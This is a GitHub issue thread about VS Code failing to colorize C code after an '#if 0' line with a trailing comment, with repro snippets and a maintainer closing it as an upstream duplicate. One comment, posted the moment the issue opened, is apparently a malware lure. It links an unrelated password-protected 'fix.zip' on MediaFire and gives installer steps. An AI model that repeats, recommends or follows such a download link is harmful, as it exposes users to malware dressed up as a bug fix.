### ISSUE TITLE
Language-c no-colorize case

### ISSUE THREAD

**Issue by lisw05** [microsoft/vscode#226931] opened 2024-08-28 06:18 UTC
Does this issue occur when all extensions are disabled?: Yes

- VS Code Version: Version: 1.92.2 (user setup)
- OS Version: Windows 11 23H2 22631.4037

Steps to Reproduce:

1. coding like these: bug case:
![img_v3_02e6_7f429fd4-4ca3-42f3-916c-cfe9f67bd9dg](https://github.com/user-attachments/assets/5a45fefe-4d59-4197-a6fe-98ad1ac1e447)
2. normal case 1:
![img_v3_02e6_a32bdc21-e7bb-42aa-a05e-56e4fef9c0ag](https://github.com/user-attachments/assets/1572f393-b1d8-4849-b233-167d42d5d771)
3. normal case 2:
![img_v3_02e6_a9cab630-8e83-4b39-a691-1f316e6af4ag](https://github.com/user-attachments/assets/4d2e2333-f68d-4cb1-b272-9a296c207971)

**Comment by PiaoR** [comment] 2024-08-28 06:18
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by alexr00** [comment] 2024-09-02 18:11
Can you share a copy/pastable snippet that I can use to reproduce the issue?

**Comment by lisw05** [comment] 2024-09-03 01:13
> Can you share a copy/pastable snippet that I can use to reproduce the issue?

yes, same as the content in pictures:
bug case:
`#if 0 //xxxxxxx
do_something(argu); //xxxxxx
#endif

if(A==B)
{
    for(i=0;i<k;i++)
    {
        do_somethingB();
    }
}
`

normal case 1:
`#if 0
do_something(argu); //xxxxxx
#endif

if(A==B)
{
    for(i=0;i<k;i++)
    {
        do_somethingB();
    }
}
`

normal case 2:
`#if 0 //xxxxxx

#endif

if(A==B)
{
    for(i=0;i<k;i++)
    {
        do_somethingB();
    }
}
`

I can add one more situation that the code behind macro can be colorized normally.
normal case 3:
`#if 0 //xxxxxx

do_something(argu); //xxxxxx
#endif

if(A==B)
{
    for(i=0;i<k;i++)
    {
        do_somethingB();
    }
}
`

**Comment by alexr00** [comment] 2024-09-03 14:11
Thank you! Duplicate of upstream issue: https://github.com/jeff-hykin/better-c-syntax/issues/4

**Closed** 2024-09-03 14:11 UTC
Labels: grammar, upstream-issue-linked
